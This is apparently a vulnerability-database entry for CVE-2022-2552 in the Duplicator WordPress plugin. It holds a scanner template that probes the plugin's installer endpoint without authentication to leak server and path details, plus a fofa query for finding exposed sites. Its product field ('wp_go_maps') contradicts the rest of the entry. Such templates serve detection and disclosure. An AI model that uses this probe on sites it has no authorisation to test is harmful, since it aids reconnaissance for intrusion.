漏洞描述
The Duplicator WordPress plugin before 1.4.7 does not authenticate or authorize visitors before displaying information about the system such as server software, php version and full file system path to the site.
CVE-2022-2552: Duplicator < 1.4.7.1 - Information Disclosure
PoC代码[已公开]
id: CVE-2022-2552
info:
name: Duplicator < 1.4.7.1 - Information Disclosure
author: iamnoooob,ritikchaddha
severity: medium
description: |
The Duplicator WordPress plugin before 1.4.7 does not authenticate or authorize visitors before displaying information about the system such as server software, php version and full file system path to the site.
impact: |
Unauthenticated attackers can access sensitive system information including server software versions, PHP version, and full filesystem paths through the exposed installer endpoint, providing valuable reconnaissance data for targeted attacks.
remediation: |
Update Duplicator plugin to version 1.4.7.1 or later that requires authentication before displaying system information.
reference:
- https://wpscan.com/vulnerability/6b540712-fda5-4be6-ae4b-bd30a9d9d698/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2552
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2552
cwe-id: CWE-862
epss-score: 0.48527
epss-percentile: 0.97652
cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:*
metadata:
verified: true
max-request: 1
fofa-query: body="/wp-content/plugins/duplicator"
vendor: snapcreek
product: wp_go_maps
tags: cve,cve2022,wp,wp-plugin,wordpress,duplicator,disclosure,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?view=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'SERVER DETAILS</div>'
- 'Setup Information'
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502207507241df2839081d443dc406a564632a8ac66ad9b0f2bf128d7d28e0cd16cba022100bebe2af34da43821a0ac7f474be326dfc43c2fd57e47338cc162349296a61c15:922c64590222798bb761d5b6d8e72950